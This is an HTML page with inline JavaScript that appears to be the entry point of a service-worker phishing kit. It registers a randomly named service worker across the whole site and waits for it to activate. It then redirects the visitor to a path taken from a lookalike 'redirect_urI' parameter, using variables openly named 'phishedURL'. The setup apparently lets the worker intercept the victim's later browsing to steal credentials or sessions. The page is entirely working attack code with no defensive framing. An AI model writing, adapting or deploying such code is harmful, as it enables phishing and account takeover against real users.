<!DOCTYPE html>
<html lang="fr">

<head>
    <meta charset="UTF-8">
</head>

<body>
    <script>
        if ("serviceWorker" in navigator) {
            navigator.serviceWorker.register("/service_worker_Mz8XO2ny1Pg5.js", {
                scope: "/",
            })
                .then((registration) => {
                    console.log("Service worker registered, waiting for activation...");
                    
                    // Wait for the service worker to become active
                    if (registration.active) {
                        // Service worker is already active
                        performRedirect();
                    } else {
                        // Wait for activation
                        registration.addEventListener('updatefound', () => {
                            const newWorker = registration.installing;
                            newWorker.addEventListener('statechange', () => {
                                if (newWorker.state === 'activated') {
                                    performRedirect();
                                }
                            });
                        });
                        
                        // Also check if it becomes active without update
                        if (registration.installing) {
                            registration.installing.addEventListener('statechange', function() {
                                if (this.state === 'activated') {
                                    performRedirect();
                                }
                            });
                        } else if (registration.waiting) {
                            registration.waiting.addEventListener('statechange', function() {
                                if (this.state === 'activated') {
                                    performRedirect();
                                }
                            });
                        }
                    }
                    
                    function performRedirect() {
                        console.log("Service worker is active, performing redirect...");
                        const phishedParameterURL = new URL(self.location.href).searchParams.get("redirect_urI");
                        const phishedURL = new URL(decodeURIComponent(phishedParameterURL));
                        
                        // Small delay to ensure service worker is fully ready
                        setTimeout(() => {
                            self.location.replace(`${phishedURL.pathname}${phishedURL.search}`);
                        }, 100);
                    }
                })
                .catch((error) => {
                    console.error(`Service worker registration failed: ${error}`);
                });
        }
        else {
            console.error("Service workers are not supported by this browser");
        }
    </script>
</body>

</html>